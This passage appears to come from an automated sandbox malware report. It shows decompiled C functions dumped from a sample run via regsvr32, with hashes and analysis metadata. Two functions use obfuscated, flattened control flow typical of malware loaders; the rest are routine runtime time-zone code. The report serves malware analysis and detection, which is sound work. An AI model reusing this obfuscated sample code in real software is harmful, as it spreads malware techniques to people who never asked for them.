				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				void* _t146;
				intOrPtr _t148;
				short* _t151;
				void* _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				intOrPtr _t178;
				signed int* _t189;

				_t189 =  &_v556;
				_v540 = 0xb572a;
				asm("stosd");
				_t159 = 0x9ed3a;
				asm("stosd");
				asm("stosd");
				do {
					while(_t159 != 0x2f577) {
						if(_t159 == 0x9ed3a) {
							_t159 = 0x2f577;
							continue;
						}
						if(_t159 == 0xa6263) {
							_v552 = 0xbaced2;
							_t167 = 0x35;
							_v552 = _v552 * 0x14;
							_v552 = _v552 ^ 0x0e9092af;
							_v556 = 0xc99a9c;
							_v556 = _v556 / _t167;
							_v556 = _v556 ^ 0x0001718b;
							_v544 = 0xc504f5;
							_v544 = _v544 >> 0xc;
							_v544 = _v544 + 0xffff280b;
							_v544 = _v544 ^ 0xffff6259;
							_t151 = E003D7C07( &_v524, _v552, _v556, _v544);
							 *_t151 = 0;
							_t159 = 0xcbc60;
							continue;
						}
						if(_t159 != 0xcbc60) {
							goto L10;
						}
						_v548 = 0x2d894b;
						_v548 = _v548 * 0x12;
						_v548 = _v548 ^ 0x03399bfc;
						_v556 = 0x67a078;
						_v556 = _v556 + 0x352d;
						_v556 = _v556 ^ 0x36cf034a;
						_v556 = _v556 ^ 0x36ad4fe0;
						_v552 = 0x64626b;
						_v552 = _v552 ^ 0xa6534916;
						_v552 = _v552 ^ 0xa632be72;
						return E003CFEF2(_v548, _v556,  &_v524, _v552, 0,  &_v524, E003CE4E2);
					}
					_v556 = 0xa81e9c;
					_t160 = 0x4c;
					_v556 = _v556 / _t160;
					_v556 = _v556 + 0xffffc963;
					_v556 = _v556 ^ 0x0001630d;
					_v552 = 0x4393fc;
					_t161 = 0x31;
					_v552 = _v552 / _t161;
					_v552 = _v552 + 0xffffe5cd;
					_v552 = _v552 ^ 0x00078689;
					_v548 = 0xceb5d8;
					_v548 = _v548 << 6;
					_v548 = _v548 | 0x13533afa;
					_v548 = _v548 ^ 0x33f9b6ff;
					_v544 = 0x26082e;
					_v544 = _v544 ^ 0xf5486db3;
					_v544 = _v544 | 0x7212a90c;
					_v544 = _v544 + 0x5c7f;
					_v544 = _v544 ^ 0xf77b990c;
					_t146 = E003CD933(_v556, _v552, 0x3c1000, _v548, _v544);
					_v544 = 0xf5c68d;
					_v544 = _v544 >> 4;
					_v544 = _v544 ^ 0x0006bd3f;
					_v548 = 0x255bfc;
					_v548 = _v548 + 0x956b;
					_v548 = _v548 ^ 0x00220742;
					_v556 = 0x8faa8d;
					_v556 = _v556 + 0xf788;
					_v556 = _v556 | 0x3578cbcc;
					_v556 = _v556 ^ 0x35f380a7;
					_v552 = 0x96e031;
					_v552 = _v552 >> 7;
					_v552 = _v552 ^ 0x0004d569;
					_t148 =  *0x3e2208; // 0x28e510
					_t178 =  *0x3e2208; // 0x28e510
					_t118 = _t178 + 0x1c; // 0x3a0043
					E003D0E90(_t118, __eflags, _v556, _v548, _v556, _t148 + 0x22c,  &_v524, _v552, _t146);
					_v548 = 0xda10c;
					_t189 =  &(_t189[0xa]);
					_v548 = _v548 >> 0xb;
					_v548 = _v548 ^ 0x000b7109;
					_v552 = 0xa6417b;
					_v552 = _v552 >> 5;
					_v552 = _v552 + 0xeeb7;
					_v552 = _v552 ^ 0x000a7b94;
					_v556 = 0xd50978;
					_v556 = _v556 + 0xffff55fc;
					_v556 = _v556 << 3;
					_t136 =  &_v556;
					 *_t136 = _v556 ^ 0x06af999a;
					__eflags =  *_t136;
					_t151 = E003C43D3(_v548, _v552, _v556, _t146);
					_t159 = 0xa6263;
					L10:
					__eflags = _t159 - 0xe3044;
				} while (_t159 != 0xe3044);
				return _t151;
			}

0x003d0b84
0x003d0b8e
0x003d0ba1
0x003d0ba2
0x003d0ba9
0x003d0baa
0x003d0bb0
0x003d0bb0
0x003d0bba
0x003d0cc9
0x00000000
0x003d0cc9
0x003d0bc6
0x003d0c51
0x003d0c62
0x003d0c63
0x003d0c67
0x003d0c6f
0x003d0c81
0x003d0c85
0x003d0c8d
0x003d0c95
0x003d0c9a
0x003d0ca2
0x003d0cb6
0x003d0cbf
0x003d0cc2
0x00000000
0x003d0cc2
0x003d0bce
0x00000000
0x00000000
0x003d0bd4
0x003d0be6
0x003d0bee
0x003d0bf6
0x003d0bfe
0x003d0c06
0x003d0c0e
0x003d0c16
0x003d0c1e
0x003d0c26
0x00000000
0x003d0c43
0x003d0cd0
0x003d0ce0
0x003d0ce5
0x003d0ceb
0x003d0cf3
0x003d0cfb
0x003d0d07
0x003d0d0a
0x003d0d0e
0x003d0d16
0x003d0d1e
0x003d0d26
0x003d0d2b
0x003d0d33
0x003d0d3b
0x003d0d43
0x003d0d4b
0x003d0d53
0x003d0d5b
0x003d0d78
0x003d0d7d
0x003d0d88
0x003d0d8f
0x003d0d9b
0x003d0da3
0x003d0dab
0x003d0db3
0x003d0dbb
0x003d0dc3
0x003d0dcb
0x003d0dd3
0x003d0ddb
0x003d0de0
0x003d0dee
0x003d0e01
0x003d0e0c
0x003d0e0f
0x003d0e14
0x003d0e1c
0x003d0e1f
0x003d0e24
0x003d0e2c
0x003d0e34
0x003d0e39
0x003d0e41
0x003d0e49
0x003d0e51
0x003d0e59
0x003d0e5e
0x003d0e5e
0x003d0e5e
0x003d0e73
0x003d0e7a
0x003d0e7f
0x003d0e7f
0x003d0e7f
0x00000000

Strings

kbd, xrefs: 003D0C16
cb, xrefs: 003D0E7A
-5, xrefs: 003D0BFE
cb, xrefs: 003D0BC0

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -5$cb$cb$kbd
API String ID: 0-2640731645
Opcode ID: 0bc0ecfcbdeb69712c5eb50f3a4b46349e58d91b1ff2992201423e737ad9fdfd
Instruction ID: 96b88f948ddb62f0da0335e82ac1f17b49533a557ea29f6b0706e76696a51128
Opcode Fuzzy Hash: 0bc0ecfcbdeb69712c5eb50f3a4b46349e58d91b1ff2992201423e737ad9fdfd
Instruction Fuzzy Hash: BD7111B21083429FC749CF24E98991FBBE1FBD4B48F10491EF19696261D3B58A4D8F93

Uniqueness

Uniqueness Score: -1.00%

Function 003E0A1E Relevance: 5.1, Strings: 4, Instructions: 130
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E003E0A1E(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				intOrPtr _v568;
				char _v584;
				signed int _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				void* _t88;
				signed int _t90;
				signed int _t94;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				intOrPtr _t113;
				signed int* _t117;

				_push(_a16);
				_t113 = _a12;
				_push(_t113);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(E003D2C2B);
				E003C2528(_t88);
				_t114 = _v600;
				_t117 =  &(( &_v608)[6]);
				_v588 = _v588 & 0x00000000;
				_t90 = 0xe4581;
				_v596 = 0x93c04;
				_v592 = 0xbb72b;
				while(_t90 != 0x1d5a2) {
					if(_t90 == 0x3c5fd) {
						_v604 = 0xd9aba0;
						_v604 = _v604 + 0x215b;
						_v604 = _v604 ^ 0x00d9ccf9;
						_v608 = 0xfaca85;
						_v608 = _v608 << 4;
						_v608 = _v608 ^ 0x7671d5df;
						_v608 = _v608 ^ 0x79da8d51;
						_v600 = 0x316e83;
						_v600 = _v600 >> 4;
						_v600 = _v600 ^ 0x00037dd7;
						_push(_t103);
						_t90 = E003CF7F9(_v604);
						_t114 = _t90;
						_t103 = _t103;
						__eflags = _t90 - 0xffffffff;
						if(__eflags != 0) {
							_t90 = 0xa57e3;
							continue;
						}
					} else {
						if(_t90 == 0x67d87) {
							_v604 = 0xc8a990;
							_v604 = _v604 + 0xa4b;
							_v604 = _v604 + 0xffffbeaf;
							_v604 = _v604 ^ 0x00c2dd60;
							_v600 = 0xb5590c;
							_v600 = _v600 >> 1;
							_v600 = _v600 ^ 0x005d4d68;
							_v608 = 0x8c8371;
							_v608 = _v608 << 0xe;
							_v608 = _v608 >> 5;
							_v608 = _v608 ^ 0x010bdbeb;
							_t103 = _v604;
							_t94 = E003CD04C(_t103,  &_v556, _v600, _v608, _t114);
							_t117 =  &(_t117[3]);
							goto L11;
						} else {
							if(_t90 == 0xa57e3) {
								_v556 = 0x22c;
								_v608 = 0x4555c3;
								_v608 = _v608 + 0xc857;
								_v608 = _v608 ^ 0x121c430e;
								_v608 = _v608 ^ 0x1251075a;
								_v604 = 0x42217f;
								_v604 = _v604 | 0xd42a6f6c;
								_v604 = _v604 + 0xd503;
								_t27 =  &_v604;
								 *_t27 = _v604 ^ 0xd46c8a13;
								__eflags =  *_t27;
								_t94 = E003DA103(_v608, _t114, _v604,  &_v556);
								_pop(_t103);
								L11:
								asm("sbb eax, eax");
								_t96 =  ~_t94 & 0x000c3cdc;
								goto L9;
							} else {
								if(_t90 == 0xe127e) {
									_t100 = E003D2C2B(__eflags,  &_v556,  &_v584);
									asm("sbb eax, eax");
									_t96 =  ~_t100 & 0x0004a7e5;
									__eflags = _t96;
									L9:
									_t90 = _t96 + 0x1d5a2;
									continue;
								} else {
									if(_t90 != 0xe4581) {
										L16:
										__eflags = _t90 - 0xbea4c;
										if(__eflags != 0) {
											continue;
										}
									} else {
										_v568 = _t113;
										_t90 = 0x3c5fd;
										continue;
									}
								}
							}
						}
					}
					return _t90;
				}
				_v600 = 0x6d09c4;
				_v600 = _v600 + 0xffff7c63;
				_v600 = _v600 ^ 0x0066678d;
				_v608 = 0xf275ab;
				_v608 = _v608 + 0xffff9875;
				_v608 = _v608 << 8;
				_t84 =  &_v608;
				 *_t84 = _v608 ^ 0xf20cf792;
				__eflags =  *_t84;
				E003D4FB8(_t114, _v600, _v608);
				_pop(_t103);
				_t90 = 0xbea4c;
				goto L16;
			}

0x003e0a28
0x003e0a2f
0x003e0a36
0x003e0a37
0x003e0a3e
0x003e0a45
0x003e0a46
0x003e0a4b
0x003e0a50
0x003e0a54
0x003e0a57
0x003e0a5c
0x003e0a61
0x003e0a6e
0x003e0a7b
0x003e0a85
0x003e0ba5
0x003e0bad
0x003e0bb5
0x003e0bbd
0x003e0bc5
0x003e0bca
0x003e0bd2
0x003e0bda
0x003e0be2
0x003e0be7
0x003e0bfb
0x003e0bfd
0x003e0c02
0x003e0c05
0x003e0c06
0x003e0c09
0x003e0c0b
0x00000000
0x003e0c0b
0x003e0a8b
0x003e0a90
0x003e0b3c
0x003e0b48
0x003e0b50
0x003e0b58
0x003e0b60
0x003e0b68
0x003e0b6c
0x003e0b74
0x003e0b7c
0x003e0b81
0x003e0b86
0x003e0b97
0x003e0b9b
0x003e0ba0
0x00000000
0x003e0a96
0x003e0a9b
0x003e0ad3
0x003e0adf
0x003e0ae9
0x003e0af1
0x003e0af9
0x003e0b01
0x003e0b09
0x003e0b11
0x003e0b19
0x003e0b19
0x003e0b19
0x003e0b2a
0x003e0b30
0x003e0b31
0x003e0b33
0x003e0b35
0x00000000
0x003e0a9d
0x003e0aa2
0x003e0ac1
0x003e0ac8
0x003e0aca
0x003e0aca
0x003e0acf
0x003e0acf
0x00000000
0x003e0aa4
0x003e0aa9
0x003e0c5f
0x003e0c5f
0x003e0c64
0x00000000
0x00000000
0x003e0aaf
0x003e0aaf
0x003e0ab3
0x00000000
0x003e0ab3
0x003e0aa9
0x003e0aa2
0x003e0a9b
0x003e0a90
0x003e0c74
0x003e0c74
0x003e0c15
0x003e0c1f
0x003e0c27
0x003e0c2f
0x003e0c37
0x003e0c3f
0x003e0c44
0x003e0c44
0x003e0c44
0x003e0c54
0x003e0c59
0x003e0c5a
0x00000000

Strings

W, xrefs: 003E0A96
[!, xrefs: 003E0BAD
W, xrefs: 003E0C0B
hM], xrefs: 003E0B6C

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: [!$hM]$W$W
API String ID: 0-1745216764
Opcode ID: a450709359f96a80317a44b2ca0a8889ebef31b5a8bf853d0d4081beceeaf68f
Instruction ID: 6d861c22765c98d41baa0e5a5e5429714db0d33525c3c67c056796906f569140
Opcode Fuzzy Hash: a450709359f96a80317a44b2ca0a8889ebef31b5a8bf853d0d4081beceeaf68f
Instruction Fuzzy Hash: 5C5159721083968BC719CF64E88955FBAE4FBD0758F100E2DF491962A0C7B4DA4C8BD3

Uniqueness

Uniqueness Score: -1.00%

Function 10023F2F Relevance: 4.7, APIs: 3, Instructions: 207
timeCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E10023F2F(void* __eflags) {
				int _v8;
				char* _v12;
				void* __ecx;
				char* _t18;
				intOrPtr _t23;
				char* _t27;
				char _t29;
				char _t30;
				signed int _t32;
				char _t34;
				void* _t35;
				char _t36;
				void* _t37;
				signed int _t40;
				char* _t43;
				char* _t46;
				intOrPtr _t47;
				void* _t56;
				signed int _t60;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				void* _t70;
				char* _t74;
				char* _t76;
				signed int** _t80;

				_push(_t55);
				_t70 = 0xc;
				_v12 = 0;
				E1001F3A0(_t70);
				 *0x100916d8 =  *0x100916d8 | 0xffffffff;
				 *0x100916c8 =  *0x100916c8 | 0xffffffff;
				 *0x10095190 = 0;
				 *_t80 = 0x10080bf8;
				_t74 = E100272CE();
				_t56 = _t69;
				if(_t74 != 0) {
					if( *_t74 == 0) {
						L41:
						_t18 = E1001F401(_t70);
					} else {
						_t19 =  *0x10095244;
						if( *0x10095244 == 0) {
							L18:
							E1001A722( *0x10095244);
							_t23 = E1001A76A(E100225A0(_t74) + 1);
							 *0x10095244 = _t23;
							if(_t23 == 0) {
								goto L41;
							} else {
								E100228E0(_t23, _t74);
								E1001F401(_t70);
								E10025410( *0x100916bc, _t74, 3);
								_t27 =  *0x100916bc; // 0x1009163c
								_t76 = _t74 + 3;
								_t27[3] = _t27[3] & 0x00000000;
								if( *_t76 == 0x2d) {
									_v12 = 1;
									_t76 = _t76 + 1;
								}
								_t60 = E1001BE81(_t56, _t76) * 0xe10;
								 *0x10091630 = _t60;
								while(1) {
									_t29 =  *_t76;
									if(_t29 != 0x2b && (_t29 < 0x30 || _t29 > 0x39)) {
										break;
									}
									_t76 = _t76 + 1;
								}
								if( *_t76 == 0x3a) {
									_t76 = _t76 + 1;
									_t32 = E1001BE81(_t60, _t76);
									_t63 =  *0x10091630; // 0x7080
									_t60 = _t63 + _t32 * 0x3c;
									 *0x10091630 = _t60;
									while(1) {
										_t34 =  *_t76;
										if(_t34 < 0x30 || _t34 > 0x39) {
											break;
										}
										_t76 = _t76 + 1;
									}
									if( *_t76 == 0x3a) {
										_t76 = _t76 + 1;
										_t35 = E1001BE81(_t60, _t76);
										_t65 =  *0x10091630; // 0x7080
										_t60 = _t65 + _t35;
										 *0x10091630 = _t60;
										while(1) {
											_t36 =  *_t76;
											if(_t36 < 0x30 || _t36 > 0x39) {
												goto L36;
											}
											_t76 = _t76 + 1;
										}
									}
								}
								L36:
								if(_v12 != 0) {
									 *0x10091630 =  ~_t60;
								}
								_t30 =  *_t76;
								 *0x10091634 = _t30;
								if(_t30 == 0) {
									goto L40;
								} else {
									E10025410( *0x100916c0, _t76, 3);
									_t18 =  *0x100916c0; // 0x1009167c
									_t18[3] = _t18[3] & 0x00000000;
								}
							}
						} else {
							_t37 = E10021D20(_t74, _t19);
							_pop(_t56);
							if(_t37 == 0) {
								goto L41;
							} else {
								goto L18;
							}
						}
					}
				} else {
					E1001F401(_t70);
					 *_t80 = 0x10095198;
					_t18 = GetTimeZoneInformation(??);
					if(_t18 != 0xffffffff) {
						_t67 =  *0x100951ec;
						_t40 =  *0x10095198 * 0x3c;
						_t68 = 1;
						 *0x10091630 = _t40;
						 *0x10095190 = _t68;
						if( *0x100951de != 0) {
							 *0x10091630 = _t40 + _t67 * 0x3c;
						}
						if( *0x10095232 == 0) {
							L7:
							 *0x10091634 = 0;
							 *0x10091638 = 0;
						} else {
							_t47 =  *0x10095240;
							if(_t47 == 0) {
								goto L7;
							} else {
								 *0x10091634 = _t68;
								 *0x10091638 = (_t47 - _t67) * 0x3c;
							}
						}
						if(WideCharToMultiByte( *0x1009505c, 0x220, 0x1009519c, 0xffffffff,  *0x100916bc, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							_t43 =  *0x100916bc; // 0x1009163c
							 *_t43 =  *_t43 & 0x00000000;
						} else {
							_t46 =  *0x100916bc; // 0x1009163c
							_t46[0x3f] = _t46[0x3f] & 0x00000000;
						}
						if(WideCharToMultiByte( *0x1009505c, 0x220, 0x100951f0, 0xffffffff,  *0x100916c0, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							L40:
							_t18 =  *0x100916c0; // 0x1009167c
							 *_t18 =  *_t18 & 0x00000000;
						} else {
							_t18 =  *0x100916c0; // 0x1009167c
							_t18[0x3f] = _t18[0x3f] & 0x00000000;
						}
					}
				}
				return _t18;
			}

0x10023f33
0x10023f39
0x10023f3d
0x10023f40
0x10023f45
0x10023f4c
0x10023f53
0x10023f59
0x10023f65
0x10023f67
0x10023f6a
0x10024070
0x100241aa
0x100241ab
0x10024076
0x10024076
0x1002407d
0x10024090
0x10024096
0x100240a3
0x100240ad
0x100240b2
0x00000000
0x100240b8
0x100240ba
0x100240c0
0x100240ce
0x100240d3
0x100240d8
0x100240de
0x100240e5
0x100240e7
0x100240ee
0x100240ee
0x100240fa
0x10024100
0x10024106
0x10024106
0x1002410a
0x00000000
0x00000000
0x10024114
0x10024114
0x1002411a
0x1002411c
0x1002411e
0x10024127
0x1002412d
0x1002412f
0x10024135
0x10024135
0x10024139
0x00000000
0x00000000
0x1002413f
0x1002413f
0x10024145
0x10024147
0x10024149
0x1002414f
0x10024155
0x10024157
0x1002415d
0x1002415d
0x10024161
0x00000000
0x00000000
0x10024167
0x10024167
0x1002415d
0x10024145
0x1002416a
0x1002416e
0x10024172
0x10024172
0x10024178
0x1002417d
0x10024182
0x00000000
0x10024184
0x1002418d
0x10024192
0x1002419a
0x1002419a
0x10024182
0x1002407f
0x10024081
0x10024089
0x1002408a
0x00000000
0x00000000
0x00000000
0x00000000
0x1002408a
0x1002407d
0x10023f70
0x10023f71
0x10023f76
0x10023f7d
0x10023f86
0x10023f91
0x10023f97
0x10023fa3
0x10023fa4
0x10023fa9
0x10023faf
0x10023fb8
0x10023fb8
0x10023fc4
0x10023fe1
0x10023fe1
0x10023fe7
0x10023fc6
0x10023fc6
0x10023fcd
0x00000000
0x10023fcf
0x10023fd1
0x10023fda
0x10023fda
0x10023fcd
0x10024017
0x10024029
0x1002402e
0x1002401e
0x1002401e
0x10024023
0x10024023
0x10024050
0x100241a0
0x100241a0
0x100241a5
0x1002405f
0x1002405f
0x10024064
0x10024064
0x10024050
0x10023f86
0x100241b5

APIs

Part of subcall function 1001F3A0: InitializeCriticalSection.KERNEL32(00000000,?,?,?,1001A732,00000009,?,1001EB47,?,?,1001A909,00000000,1001A950,?,?,?), ref: 1001F3DD
Part of subcall function 1001F3A0: EnterCriticalSection.KERNEL32(?,?,?,1001A732,00000009,?,1001EB47,?,?,1001A909,00000000,1001A950,?,?,?), ref: 1001F3F8

Part of subcall function 1001F401: LeaveCriticalSection.KERNEL32(?,1001A7CC,00000009,?,00000009,?,?,1001A78C,000000E0,1001A779,?,1001F3C0,00000018,?,?), ref: 1001F40E

GetTimeZoneInformation.KERNEL32(0000000C,?,10018569,-0000076C,0000000B,0000000B,?,10023F0A,10023E6D,?,?,?,?,1001CF2E,?,?), ref: 10023F7D
WideCharToMultiByte.KERNEL32(00000220,1009519C,000000FF,0000003F,00000000,?,?,10023F0A,10023E6D,?,?,?,?,1001CF2E,?,?), ref: 10024013
WideCharToMultiByte.KERNEL32(00000220,100951F0,000000FF,0000003F,00000000,?,?,10023F0A,10023E6D,?,?,?,?,1001CF2E,?,?), ref: 1002404C

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
String ID:
API String ID: 3442286286-0
Opcode ID: 5d9c9351b3cebcaeec044863c13a421ce3e8bed8b8125dd986b616ba27fb5bca
Instruction ID: 446fd4c20ea8d7ba38868ede5d6dffda8138973b554bf4a457aa3fb1a553413b
Opcode Fuzzy Hash: 5d9c9351b3cebcaeec044863c13a421ce3e8bed8b8125dd986b616ba27fb5bca
Instruction Fuzzy Hash: 3B610375E041609AE719CF25ECC1BA93BF8FB16390F96012FF5988B1A1DB3199C2C750

Uniqueness

Uniqueness Score: -1.00%

Function 1001CE60 Relevance: 4.6, APIs: 3, Instructions: 75
timeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001CE60(void* __edi, void* __esi, intOrPtr* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				short _v54;
				struct _TIME_ZONE_INFORMATION _v208;
				signed int _t23;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_t39 = __esi;
				_t37 = __edi;
				GetLocalTime( &_v20);
				GetSystemTime( &_v36);
				_t43 = _v36.wMinute -  *0x10094faa; // 0x0
				if(_t43 != 0) {
					L6:
					_t23 = GetTimeZoneInformation( &_v208);
					if(_t23 == 0xffffffff) {
						_t24 = _t23 | 0xffffffff;
					} else {
						if(_t23 != 2 || _v54 == 0 || _v208.DaylightBias == 0) {
							_t24 = 0;
						} else {
							_t24 = 1;
						}
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t37 = _t37;
					 *0x10094f98 = _t24;
					_t39 = _t39;
					L14:
					_t31 = E10023E29(_t37, _t39, _v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _t24);
					_t36 = _a4;
					if(_t36 == 0) {
						return _t31;
					}
					 *_t36 = _t31;
					return _t31;
				}
				_t44 = _v36.wHour -  *0x10094fa8; // 0x0
				if(_t44 != 0) {
					goto L6;
				}
				_t45 = _v36.wDay -  *0x10094fa6; // 0x0
				if(_t45 != 0) {
					goto L6;
				}
				_t46 = _v36.wMonth -  *0x10094fa2; // 0x0
				if(_t46 != 0) {
					goto L6;
				}
				_t47 = _v36.wYear -  *0x10094fa0; // 0x0
				if(_t47 != 0) {
					goto L6;
				}
				_t24 =  *0x10094f98; // 0x0
				goto L14;
			}

0x1001ce60
0x1001ce60
0x1001ce6d
0x1001ce77
0x1001ce81
0x1001ce88
0x1001cec5
0x1001cecc
0x1001ced5
0x1001cef2
0x1001ced7
0x1001ceda
0x1001ceee
0x1001cee9
0x1001ceeb
0x1001ceeb
0x1001ceda
0x1001ceff
0x1001cf00
0x1001cf01
0x1001cf02
0x1001cf03
0x1001cf04
0x1001cf09
0x1001cf0a
0x1001cf29
0x1001cf2e
0x1001cf36
0x1001cf3b
0x1001cf3b
0x1001cf38
0x00000000
0x1001cf38
0x1001ce8e
0x1001ce95
0x00000000
0x00000000
0x1001ce9b
0x1001cea2
0x00000000
0x00000000
0x1001cea8
0x1001ceaf
0x00000000
0x00000000
0x1001ceb5
0x1001cebc
0x00000000
0x00000000
0x1001cebe
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 1001CE6D
GetSystemTime.KERNEL32(?), ref: 1001CE77
GetTimeZoneInformation.KERNEL32(?), ref: 1001CECC

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Time$InformationLocalSystemZone
String ID:
API String ID: 2475273158-0
Opcode ID: 0b5035d87ac9cddff5ae66f7028ebe5b1a7ab362a41586e186e8ad92ee11203a
Instruction ID: a29eaec9ce9239a7348d1b7fec6cbf98514966760240c2d36118637b990235db
Opcode Fuzzy Hash: 0b5035d87ac9cddff5ae66f7028ebe5b1a7ab362a41586e186e8ad92ee11203a
Instruction Fuzzy Hash: BB213B2A80002AE9DB10EF94D844EFE77F9FB08755F810526F859EA190E738CDC6DB24

Uniqueness

Uniqueness Score: -1.00%

Function 1000EA9B Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000EA9B(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E1000E8C9() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
